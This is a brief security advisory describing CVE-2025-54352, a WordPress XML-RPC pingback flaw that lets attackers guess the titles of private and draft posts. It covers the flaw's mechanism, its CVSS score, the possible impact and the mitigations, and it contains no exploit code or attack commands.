CVE-2025-54352: 
WordPress vulnerability analysis and mitigation

WordPress versions 3.5 through 6.8.2 contain a vulnerability (CVE-2025-54352) that allows remote attackers to guess titles of private and draft posts through pingback.ping XML-RPC requests. The vulnerability was discovered and reported by Imperva researchers in May 2025, affecting potentially all WordPress installations since December 2012, as the XMLRPC feature is enabled by default since WordPress 3.5 (NVD, Imperva Blog).

The vulnerability exploits the pingback feature in WordPress's XMLRPC functionality. The attack involves sending specifically crafted POST requests to the XMLRPC endpoint of the victim's site. The issue occurs during the URL verification process where the server attempts to verify if a blogpost corresponding to the incoming request data exists in the MySQL database. When a fragment is present in the target URL, a regular expression removes any character outside a-z or 0-9 and searches for matches in all post titles in the database, including private and draft posts. The vulnerability has been assigned a CVSS v3.1 base score of 3.7 (LOW) with vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N (NVD, Imperva Blog).

The vulnerability can lead to the exposure of sensitive information through the leakage of private and draft post titles. Historical examples demonstrate the potential severity: a premature release of earnings reports has previously led to significant market value losses, such as Google's case in 2012 where $22 billion in market value was erased. The leaked titles could also lead to insider trading, legal liabilities, and reputational damage (Imperva Blog).

Users are recommended to either update their WordPress installation to the latest version or disable the XMLRPC endpoint if not in use. Imperva customers are automatically protected against this attack through both CWAF and WAF-GW dedicated protections. A testing script is available to check if a site is vulnerable to this attack (Imperva Blog).